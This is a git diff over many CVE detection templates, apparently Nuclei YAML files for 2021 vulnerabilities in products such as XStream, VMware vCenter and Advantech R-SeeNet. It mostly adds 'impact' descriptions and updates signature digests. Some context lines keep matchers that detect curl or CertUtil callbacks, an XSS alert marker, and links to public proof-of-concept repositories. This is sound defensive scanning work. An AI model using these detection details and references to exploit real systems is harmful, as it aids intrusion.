   remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
   reference:
     - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022074feb9a069ccc1eb1881e8a65523f2ab08411c5a4aca40a0e8c8e0ebf0b6c50c02207b72b645b01bab1c26ec397bcf2d390cfa6f20696dede2bc1021f0a2af53a45c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202fde19cb240c52798cbcd50eaed31c914582d38b94950a4372f8ab59a798feca02203db17d57dd0ecd5ded2ba6afe946c285ca290519525550a0abe019de0844433b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml
index 942e11c731..228344ba08 100644
--- a/http/cves/2021/CVE-2021-21345.yaml
+++ b/http/cves/2021/CVE-2021-21345.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
   reference:
     - https://x-stream.github.io/CVE-2021-21345.html
@@ -105,4 +107,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4b0a00483046022100e504b1901f2827f61d8bfc6e7bcb2a1d64ac5faf3c85000cfbf1d8d85830f1fd022100d0cf22a25d0905961db603df6946c2da6b68e6f3a768a674f0d41060564a13d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100beb8a6dd020272ae8410bfbaa5ef4ac27a1930e600ffbd59405b7a2af0d701380221009350a88cb062549f69c67680d94a1c6bd9876f1e41507c536737d9c607b5472f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml
index ae64f6dd8b..b42fa73cd0 100644
--- a/http/cves/2021/CVE-2021-21351.yaml
+++ b/http/cves/2021/CVE-2021-21351.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
@@ -131,4 +133,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022002765c0d73a7ec09669911fa452432c2a99d486f144d6d3098f407b5fe179943022100a882842ccd006b3b87def6ae6effdd7f56aeecdce2a8161e1c21dd2b574b615c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f7f8b0c485012b47e2438d0e0c16d636b3fb77020faa05d96e80dff23e146fed022100d5ac56f36dec565ed1f8511f77bc36883c45745b70d11ad1eea9483960bc43a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml
index ff6fdc6b25..95226f2619 100644
--- a/http/cves/2021/CVE-2021-21389.yaml
+++ b/http/cves/2021/CVE-2021-21389.yaml
@@ -5,6 +5,8 @@ info:
   author: lotusdll
   severity: high
   description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.
   remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
   reference:
     - https://github.com/HoangKien1020/CVE-2021-21389
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ec4453b5d2608f2234d0b08819771e5a95343a6933125f25c5c30e9c6e2e7dc302206c6eb49493754b9c643a749c23a9b5115a8658cb221fd91dc64bb653b6561fa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f15ffded4b610e49a244b40783f6e6556742da9af58209966f98b3b7641f01f6022100c9e832748e263d7647645cd2e4ea64baaaa7a7c054ebb5d71d026d8607c5af95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml
index 1708689e6b..07c3dee71d 100644
--- a/http/cves/2021/CVE-2021-21402.yaml
+++ b/http/cves/2021/CVE-2021-21402.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
   remediation: This is fixed in version 10.7.1.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022064b0ffaaaee3447f82bafbf3d2d68745f7d8c1a284b3afa80848fd0bba3e890c02207926cf0f6c6664814b112d444d1fb269a802efeba6be7a47f24505869a8f962f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008e0fc583e4f259f7d8bf09b0faa304a78e97254ada9dc44983173c1b350fcaf6022100ab37c80f4ba67276cd94590764cbf97cd4bcab4dff4f9763c2840305ae28196d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml
index e6bec64429..2c066bab0e 100644
--- a/http/cves/2021/CVE-2021-21479.yaml
+++ b/http/cves/2021/CVE-2021-21479.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
     execute java expressions and compromise the availability and integrity of the system.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - "has invalid value!"
           - '"status" : "400"'
         condition: and
-# digest: 4a0a00473045022100fefb40d4239af70119d81250435f5b629d10c666eec015319543dfddf17ebd68022060fcd655f7dcf1e1246d908a79f658e287cff1766675d3505cdd55065e0571e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220106f5c511cfb4e10fddcc98691249d094843d9a6532784093f11f08c907f35c0022100caa4e53c6eee1055640540684783d0a03dfa2f97be4dae8719a599d09decabc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml
index 37233a3fc2..435dcc0353 100644
--- a/http/cves/2021/CVE-2021-21745.yaml
+++ b/http/cves/2021/CVE-2021-21745.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould
     use this vulnerability to perform illegal authorization operations by sending a request to the user to click.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the router.
   remediation: |
     Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b016e789598fa23dbb748c0bb8d4e6e39515ca8037c06b5ae9bd4fe145d384a20221009e8d75ddd6db7072ce46c410f4e76d6e17b449e04e8a03b5c007c1de7df7739d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fd996f1714cf8b2907368c8b3c2143f54be762a57aae03e2aae35f54fb17a7b8022100d0c08a1fa814bc7bba2bf5bfe879b976e844377f3591e6256ea324b8b83f6321:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml
index 4341d8851e..fa8dd37da0 100644
--- a/http/cves/2021/CVE-2021-21799.yaml
+++ b/http/cves/2021/CVE-2021-21799.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022076c2dc5c998cdd2ba920855c9140cd4b0c901b4f6f3d4909df402062d0e97c010221008770cf894e53b3f16010976360af5822a713af8bb42420ea244690a5aa892e45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205fd2082b85fda2a545d5dab49184c5277b9eb08fc4cde9d882c5ca4f99393cf3022100bf4461c2b3cfd41b3c2a1ae06c4c3581024889182cbe9b62ac9017c99a64fe02:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml
index 70b1e7e90c..fd739617a7 100644
--- a/http/cves/2021/CVE-2021-21801.yaml
+++ b/http/cves/2021/CVE-2021-21801.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210081d394678a90af8813f565753145353ad71b475840b6a1d484e561d29ed1594d022100e0d8513926b86fc5a12f3c7488065d9a9a23917005eeb6219dae1e4b254e4963:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022055a5f1979d921b8c9c93258196a7790c22c8b2a5b789918a34c6d10aecda196902205a00da13f0d630c0f6a388135319858cb036b0c2b5768d5aade7c9c0fa6bfa44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml
index c52f66ba9d..58182f6436 100644
--- a/http/cves/2021/CVE-2021-21802.yaml
+++ b/http/cves/2021/CVE-2021-21802.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022045e841ef485e11079fa41961cac7d23bfb95b644e4ae833979e5ad0a1b540cf5022100fe6fdacdac0e7326a21d8f72d2f7a09b168f7498f4573e6bc8a5ccd3ab97985d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ad679ec4844e5cdd5f44b2a3e2b018ae6c3c85d02e272c5c072e2bf19a072a93022100cf91907941cdf7ba34f6316819dd486b6ef72c9d1c17a00a674ff51a2d425a8c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml
index f25c1b0199..d114710d49 100644
--- a/http/cves/2021/CVE-2021-21803.yaml
+++ b/http/cves/2021/CVE-2021-21803.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e1e8da0a23fa99f37834402a9372bcfeab2b38db3b120750076d173ba953d6e0022100db601bccaf5172dc2328a6704fd5401aab7a286041ed21707629f609fb61afb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022056b8cfa1a137eb80648287b43bf8dd581fbc050e3815b836acf1da71f471e15902207628cfaf5d17c06bc7b27f11c4ccde115e26d852893a26bf7e4202097fb64c28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml
index fa40ee371f..dd962b5b44 100644
--- a/http/cves/2021/CVE-2021-21805.yaml
+++ b/http/cves/2021/CVE-2021-21805.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a9abe583384289458b27c74d5a9ce090205179797984442fc1ae7c6ebefda24b022100fcafdcb9b116be79ad712f050d3892cab01ab2c85ec174975063ef47a967becf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205b1f3e3dc77e4d47d39564823321759ecd40999257ae77797e2435613b8cb5530220091b5ef4f98d86e5aa8a003b75862f78c104c48428b42072af4b09a465ac7c03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml
index 4cba25a1f5..5f21ed004a 100644
--- a/http/cves/2021/CVE-2021-21816.yaml
+++ b/http/cves/2021/CVE-2021-21816.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.
   remediation: |
     Upgrade the router firmware to the latest version provided by D-Link.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203793824383c2b91faf82635c7781a3067996ae70d5dedf31aca4e80246012ee1022100c829ed9f6e56569f89dc485736333f5f5a86e810842b9dafcf796869fc6aa5d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210082dc31389a86be66957e057dd522035b4066992ccbcb81583cdf15d4ea5bc093022100d2e6283711f33aa8d8a3591b2afcaa7ee92e501818d9975ff87d3101f627e0ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml
index ae316db691..f40bec2a17 100644
--- a/http/cves/2021/CVE-2021-21881.yaml
+++ b/http/cves/2021/CVE-2021-21881.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device.
   remediation: |
     Apply the latest firmware update provided by Lantronix to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 4a0a00473045022100c271d05ccfbd512295e3800f2ae7cb9db59ac26fda247ec9afe6fed49f8ba55c02200775322952726b5fdc4ced5ec149ec33a0794c90a6ed62c9c5c964cc734098da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100894daa99de6a7106098b95f7e3a2fb7897ff6edd1736e5c9af52c45a6d516b9f022100e2a93593783f9e1501eb644cb90d66bc306d66a4d1b13542b61859b3f4ffb8f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml
index 3258ba7f2e..17be68680a 100644
--- a/http/cves/2021/CVE-2021-21972.yaml
+++ b/http/cves/2021/CVE-2021-21972.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a631b266908c32a7c7a05773eaed6a60850c56f95c376cade78fa6106abd8c3602204ab005be70a77e861fbd78ceaf90a539200beab1fa68b9da79b3a2a81464c201:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206a765c6cd981dd9db12957119c0657c76b0c734ce71d67d1136e5c6f1c37f7a80221009345a880b64a2ac98ba693acd467aa6e36882f56f0d4712315b75f4621e3d58d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml
index ee1a68e692..7a27fed3fa 100644
--- a/http/cves/2021/CVE-2021-21973.yaml
+++ b/http/cves/2021/CVE-2021-21973.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.
   remediation: |
     Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022100c22a20092663e5a6f0b8eab8d9ab439c51160e741fb347e23beaf10161b705aa02202a529ca552689a93108ec2385b3a3e4584d187d73d8da1d3235359e0a0d6f8eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204ecf1bfcc7c91162e8a61e0ee67342c77e315fe9d780d3cdde633b63415c1c6802206717748b2ef1197d9539e76a7374ddf3cf0163afd88ab6886bbe4461340a21fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml
index 84522079ab..ce9462e06c 100644
--- a/http/cves/2021/CVE-2021-21975.yaml
+++ b/http/cves/2021/CVE-2021-21975.yaml
@@ -5,6 +5,8 @@ info:
   author: luci
   severity: high
   description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.
   remediation: |
     Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206436da71c803ebfd847c79755f2cd219aaecf85c01039f11771583e5e7b44971022100f7ec05d8f40ec96741e66a13c0dc935e86ff415c6dc52942484a5c3bdc759a08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022040ba0c78741d88f0436b59d7d4b71a0415232c4cf2f700318c30845ca1f7b52602205e716613855d10befab063dc7377e49bcc1908ed4d8642278f2333363689729d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml
index 067afbc9d5..98697331a8 100644
--- a/http/cves/2021/CVE-2021-21978.yaml
+++ b/http/cves/2021/CVE-2021-21978.yaml
@@ -8,6 +8,8 @@ info:
     VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
     An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
     file leading to remote code execution within the logupload container.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009c7e8664405ddbc0ef5ea2bb4238999afd73de353a4c9b55bbe325ff7f68aaf6022100872fe05e1fe36c0f584d8e8c2e1b3c3a48e9faecd44ef74ae52538708448d7cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022008d94be378ce100ffe413d4a4db255886767733238801082f9bc340f96da9cfb02200c0d0b36b6e031a5116de6b5bbb102372c7b7f420ef0622deb6737ccfaad55bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml
index 064b11112d..2c60db7477 100644
--- a/http/cves/2021/CVE-2021-21985.yaml
+++ b/http/cves/2021/CVE-2021-21985.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: body
         words:
           - '{"result":{"isDisconnected":'
-# digest: 4b0a004830460221009b3d5793657099d1624d2207b24b30297b7bb4a2590ec86dc63ba78bd4dc1196022100e2c11fbc77086bd1116e9bfd5c3b0c6401e0d11a9382350a9995b6bc609aa5b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c093f51027e5b5706701d3dd17cb3cc721486a97501f1ef2cdc84ae57332ce9702200129ff6b32e3973a9d4cbb227492327aebf40f2f984b1915b4a860217b6a7d68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml
index f6b7039334..f2f13febee 100644
--- a/http/cves/2021/CVE-2021-22005.yaml
+++ b/http/cves/2021/CVE-2021-22005.yaml
@@ -5,6 +5,8 @@ info:
   author: PR3R00T
   severity: critical
   description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
+  impact: |
+    Allows an attacker to upload and execute arbitrary files on the target system
   remediation: |
     Apply the necessary security patches or updates provided by VMware
   reference:
@@ -46,4 +48,4 @@ http:
           - "contains(body_1, 'VMware vSphere')"
           - "content_length_2 == 0"
         condition: and
-# digest: 4a0a004730450220759c230f050e08ed5982861d1b8fb892d8b49a24f0c6602dd06cc4cd7166c54a022100fd2e2c715d74f71ddb40d6be930d42b9e0788155699f30ad86c9a925f3b8c31e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fd67bc4992b52e16e525e31b0db3fe0c0d1f072d1ad90706274073f8d7a516da022100ea04303bbeabb9eb231769f0feecc0bcbc02e8c4e0719496f689ce44942a348c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml
index 522232f0f4..a35b03bb8e 100644
--- a/http/cves/2021/CVE-2021-22053.yaml
+++ b/http/cves/2021/CVE-2021-22053.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.  When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: interactsh_request
         regex:
           - 'curl|CertUtil'
-# digest: 4a0a00473045022100c8aa318c60bddfd45e8abefa2a9e3e02b6c7013b334e82ca8f42199cbb9bb3e302202d9a326666df11263e1a9d44fd0861904bab78e76778f29b07a76a4cb1f54f66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207f9e2f15e491873cf22cfd1d1ca2b9cc9283ca16b991c1312e8198ca2f6aeaf0022100e91721e028ca06372c4de229a27a05a398158a433cbf970b1d8eb7f91f66dcdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml
index 7b291ccef7..77fb1d7cd6 100644
--- a/http/cves/2021/CVE-2021-22054.yaml
+++ b/http/cves/2021/CVE-2021-22054.yaml
@@ -5,6 +5,8 @@ info:
   author: h1ei1
   severity: high
   description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the necessary patches or updates provided by VMWare to fix the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c92d23560955d24dd2e2cad16ce1906bba4b03b18c1c8a5d8e1e5deddc03dc0f022100fcf07afbab96f59b8638ae776eed61014355387f6497bdfaaae750ba00e07341:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dc7ecb19748690d8a777bc9c86f1152f1cf2281d97614fa5b447d84adfbeaf34022100997d86274c3e4ec5dba2ee6cc130796fe594495f242b34b1a48ea5882c6cf407:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml
index 469c7c89ec..9577b017d7 100644
--- a/http/cves/2021/CVE-2021-22122.yaml
+++ b/http/cves/2021/CVE-2021-22122.yaml
@@ -1,11 +1,13 @@
 id: CVE-2021-22122
 
 info:
-  name: FortiWeb - Cross-Site Scripting
+  name: FortiWeb - Cross Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
     FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
+  impact: |
+    Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking.
   remediation: |
     Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb.
   reference:
@@ -41,4 +43,4 @@ http:
           - "alert('document.domain')"
           - "No policy has been chosen."
         condition: and
-# digest: 4a0a0047304502207ef85bcdfa4d84ae8ef8abd7116713f33b91b1e3b7084260a3d8641966bda3160221009ab469c25918160343f47974d9e7077b9c05eaf3481ae2609a120c50e4f9bc28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
